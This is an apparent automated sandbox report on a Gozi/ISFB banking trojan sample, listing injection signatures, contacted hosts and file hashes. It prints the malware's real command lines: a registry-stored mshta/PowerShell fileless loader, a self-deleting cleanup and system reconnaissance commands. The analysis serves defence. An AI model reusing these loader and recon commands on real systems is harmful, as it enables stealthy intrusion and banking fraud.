Malware Analysis Report

2025-08-11 01:44

Sample ID 230308-tqh2xadh7z
Target t.tgz
SHA256 1b0194d033b65fbc9dc1955c10395fff4d0943bc0e1e54a92b7c36119a7c051f
Tags
gozi 20007 banker isfb trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1b0194d033b65fbc9dc1955c10395fff4d0943bc0e1e54a92b7c36119a7c051f

Threat Level: Known bad

The file t.tgz was found to be: Known bad.

Malicious Activity Summary

gozi 20007 banker isfb trojan

Gozi

Blocklisted process makes network request

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Runs net.exe

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Suspicious behavior: CmdExeWriteProcessMemorySpam

Runs ping.exe

Discovers systems in the same network

Gathers system information

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-03-08 16:16

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-03-08 16:15

Reported

2023-03-08 16:18

Platform

win10v2004-20230220-en

Max time kernel

150s

Max time network

153s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi

banker trojan gozi

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4208 set thread context of 804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 804 set thread context of 3772 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 set thread context of 3440 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 set thread context of 1344 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 804 set thread context of 4112 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 set thread context of 2232 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1344 set thread context of 3184 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 804 set thread context of 4844 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 560 wrote to memory of 4324 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 560 wrote to memory of 4324 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 560 wrote to memory of 4324 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4364 wrote to memory of 4208 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4364 wrote to memory of 4208 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4208 wrote to memory of 1084 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4208 wrote to memory of 1084 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1084 wrote to memory of 2408 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1084 wrote to memory of 2408 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4208 wrote to memory of 2652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4208 wrote to memory of 2652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2652 wrote to memory of 2008 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2652 wrote to memory of 2008 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4208 wrote to memory of 804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4208 wrote to memory of 804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4208 wrote to memory of 804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 4208 wrote to memory of 804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 804 wrote to memory of 3772 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 wrote to memory of 3772 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 wrote to memory of 1344 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 804 wrote to memory of 1344 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 804 wrote to memory of 1344 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 804 wrote to memory of 3772 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 wrote to memory of 3772 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 wrote to memory of 3440 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 wrote to memory of 3440 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 wrote to memory of 3440 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 wrote to memory of 1344 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 804 wrote to memory of 1344 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 804 wrote to memory of 3440 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 wrote to memory of 4112 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 wrote to memory of 4112 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 wrote to memory of 4112 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 wrote to memory of 4112 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 wrote to memory of 2232 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 wrote to memory of 2232 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 wrote to memory of 2232 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 804 wrote to memory of 2232 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1344 wrote to memory of 3184 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1344 wrote to memory of 3184 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1344 wrote to memory of 3184 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1344 wrote to memory of 3184 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1344 wrote to memory of 3184 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 804 wrote to memory of 2092 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 804 wrote to memory of 2092 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 804 wrote to memory of 4844 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 804 wrote to memory of 4844 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 804 wrote to memory of 4844 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 804 wrote to memory of 4844 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2092 wrote to memory of 2528 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2092 wrote to memory of 2528 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2092 wrote to memory of 1592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 2092 wrote to memory of 1592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 804 wrote to memory of 4844 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 804 wrote to memory of 4844 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 804 wrote to memory of 2544 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 804 wrote to memory of 2544 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 804 wrote to memory of 208 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 804 wrote to memory of 208 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 208 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 208 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 804 wrote to memory of 1944 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 804 wrote to memory of 1944 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 804 wrote to memory of 2732 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\63338a1c62335e2478ca4592fde772ead9637ec24ebd389f92a620c7b2651d2e.dll,#1

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\63338a1c62335e2478ca4592fde772ead9637ec24ebd389f92a620c7b2651d2e.dll,#1

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Igxu='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Igxu).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EB212225-4E4E-5501-B04F-6259E4F3B69D\\\BookVirtual'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxvvjkglf -value gp; new-alias -name sabpvj -value iex; sabpvj ([System.Text.Encoding]::ASCII.GetString((jxvvjkglf "HKCU:Software\AppDataLow\Software\Microsoft\EB212225-4E4E-5501-B04F-6259E4F3B69D").FolderProcess))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q0qstetp\q0qstetp.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6BD4.tmp" "c:\Users\Admin\AppData\Local\Temp\q0qstetp\CSC7182A83187C14DADB55CBFCD9FAEFCE.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wir3sxsr\wir3sxsr.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6CCE.tmp" "c:\Users\Admin\AppData\Local\Temp\wir3sxsr\CSC26E5B873B3C14D448ECCD3F23066F5F6.TMP"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\63338a1c62335e2478ca4592fde772ead9637ec24ebd389f92a620c7b2651d2e.dll"

C:\Windows\system32\PING.EXE

ping localhost -n 5

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\EBE4.bin1"

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\system32\more.com

more

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EBE4.bin1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\EBE4.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EBE4.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\EBE4.bin1"

C:\Windows\system32\net.exe

net view

Network

Country Destination Domain Proto
US 8.8.8.8:53 14.110.152.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 199.176.139.52.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 58.104.205.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 58.104.205.20.in-addr.arpa udp
US 8.8.8.8:53 62.13.109.52.in-addr.arpa udp
US 8.8.8.8:53 trackingg-protectioon.cdn4.mozilla.net udp
US 8.8.8.8:53 97.238.32.23.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 209.197.3.8:80 tcp
US 35.190.80.1:443 tcp
GB 185.158.250.165:80 185.158.250.165 tcp
US 8.8.8.8:53 164.2.77.40.in-addr.arpa udp
US 8.8.8.8:53 165.250.158.185.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 trackingg-protectioon.cdn4.mozilla.net udp

Files

memory/4324-133-0x00000000027A0000-0x00000000037A0000-memory.dmp

memory/4324-134-0x0000000015570000-0x0000000015576000-memory.dmp

memory/4324-135-0x00000000027A0000-0x00000000037A0000-memory.dmp

memory/4324-136-0x0000000015BE0000-0x0000000015BED000-memory.dmp

memory/4324-139-0x00000000027A0000-0x00000000037A0000-memory.dmp

memory/4364-152-0x00000276D6D60000-0x00000276D7217000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cmdq1qgp.ble.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4208-153-0x000001ACF0C00000-0x000001ACF0C22000-memory.dmp

memory/4208-163-0x000001ACF0B50000-0x000001ACF0B60000-memory.dmp

memory/4208-164-0x000001ACF0B50000-0x000001ACF0B60000-memory.dmp

memory/4208-165-0x000001ACF0B50000-0x000001ACF0B60000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\q0qstetp\q0qstetp.cmdline

MD5 651b587b5ceb1707927636685e4ed93d
SHA1 c5fa9322420b56de83e10579591f7afa993f2c63
SHA256 bbfed94d61c6f521f827e33e4a8039d1b9fa389e452dc89577f9895609ecac85
SHA512 a5829cacf2496ffafa76c98628367dfea3ef49fad34d544d89206cdd26ed2154cb509fca46d1f9fb98e4633e25c24b11c94935b6efcc8be160c1436273ac8075

\??\c:\Users\Admin\AppData\Local\Temp\q0qstetp\q0qstetp.0.cs

MD5 bd49a7184d9437c2fc1f479f064cd629
SHA1 cbc187f4d9c71eea6ceef8b6f6584456df0ed97e
SHA256 d9193d05e3439096314ed9a7b47a04e7afb4eefe34601ad3f21afe7db216742a
SHA512 2655a3043c23ed39dcb88615084c5897b8ba7c36a19d52d650c6122e7bcfab7056f52c0f7a89131db8972b9285e15e2cbddd4216129df02855ce0ef87da8cce3

\??\c:\Users\Admin\AppData\Local\Temp\q0qstetp\CSC7182A83187C14DADB55CBFCD9FAEFCE.TMP

MD5 d6d9d005784a43d7eae3543c940d7d35
SHA1 6cabd66e35da5e7f8a84bfdf279758088c042ba6
SHA256 7a7e47da28fa5ffd1bfc22ca42900708d00920bd8b1eb6c52fcf4998cccceadb
SHA512 7a4829719e015beb891727113e730b462a53017330bdbe47f430486183d87eed63c09130903aed4aec7c256df03542cf61b7f4387ae0980de24459ea501e2696

C:\Users\Admin\AppData\Local\Temp\RES6BD4.tmp

MD5 2d2bf756ae4c3bcb58f64fdb0b1a86b3
SHA1 d3bed8129c1c4f63a6151c4acfbe27b3d4011725
SHA256 de7f99a3727649978aa58ae043c159f2ef832f3e57e584f0d2441c8d564eba82
SHA512 06fd5e270f66322da9dd7eb964cf02974389eae387e991d076dfa86824ecad4443bf185abe52ef4f9a6793f99c95bc5f438c6ae9599da970954d59e6a820012d

C:\Users\Admin\AppData\Local\Temp\q0qstetp\q0qstetp.dll

MD5 6f8e06d1ad44febd0d4dfe4a99c5f05e
SHA1 5f9c158171904a232caf803d24fa4fa7015a4fde
SHA256 334ac4dae1c1a10e99c62e512bcbeeb106464f174dcad24c92946da84f5c6048
SHA512 7042f7859cbc236d23b61605fcdae55e0ccab75e644719e6f8d4e23a2e0f5bc78377e88d0e820b0b66e45c066eb2b965abe0bdef2c8a819c4844946dce720cb7

\??\c:\Users\Admin\AppData\Local\Temp\wir3sxsr\wir3sxsr.cmdline

MD5 7b2ac1280e3cedc1bd1cb9f868ff2e49
SHA1 00da23403eb0007251f2fe79e231b2bfb42dd9cc
SHA256 3df138466db767f371e2fbc893a597a02cbeecdd2c19657d5a87b7732cd4ee1f
SHA512 ea336463ad7e705803c7526a73849e2826e079b703f83f19dab84a9fecb5c4b2d5819745fabdaba90c99155135898eceaa65dac32f7399b327a523afb4f7a150

\??\c:\Users\Admin\AppData\Local\Temp\wir3sxsr\wir3sxsr.0.cs

MD5 f940d18acdc4088474574ab02034b84d
SHA1 b4a132a7603699cb6faf9fd4057f14d18ed4b83d
SHA256 01b20e366874c9f04c18819e9076c68e80ae0bcb8354f7b5ae72e3d9f38e1aeb
SHA512 4d2f49205ab6012e0b5e3a5f12a514550cdbd556b3567626286b26869120ac6ccf3abc08fdd3e975a41c2bac0eddefd03fa262ecc52de03e959c25791432831a

\??\c:\Users\Admin\AppData\Local\Temp\wir3sxsr\CSC26E5B873B3C14D448ECCD3F23066F5F6.TMP

MD5 a0dd5ccd9606e01c3a69616112a4a084
SHA1 8921aa75327eaa7f181370a3a2c018281e1a92fc
SHA256 2ca4f823f27336c0341cc715e839b6ce9addaa579666b8f89c5be5e5e4c54c52
SHA512 10048f9c972bcb8abf697382fc3881bf11f4f8e4df5c5fd7fdaccda0506726b1877d35653ec934355e7c211e242eeceab709caaaf7dbd06b7f97fd185d406f07

C:\Users\Admin\AppData\Local\Temp\RES6CCE.tmp

MD5 e3314aef6101867f045040474361d994
SHA1 7fee4426539cc14088a21db48cdd1603411989de
SHA256 2b5039c4d44dcc7758e6e9d783aa5d0fb038224c135089b3eb80bd82789cf987
SHA512 db4e9f69e8641184e86885dc9ca3eb0d82bf2d259fea95ea2762949be4d333552c29031193a075ab62879faef8ec6e405399b19ed00ef6bbbc29580c32937b06

C:\Users\Admin\AppData\Local\Temp\wir3sxsr\wir3sxsr.dll

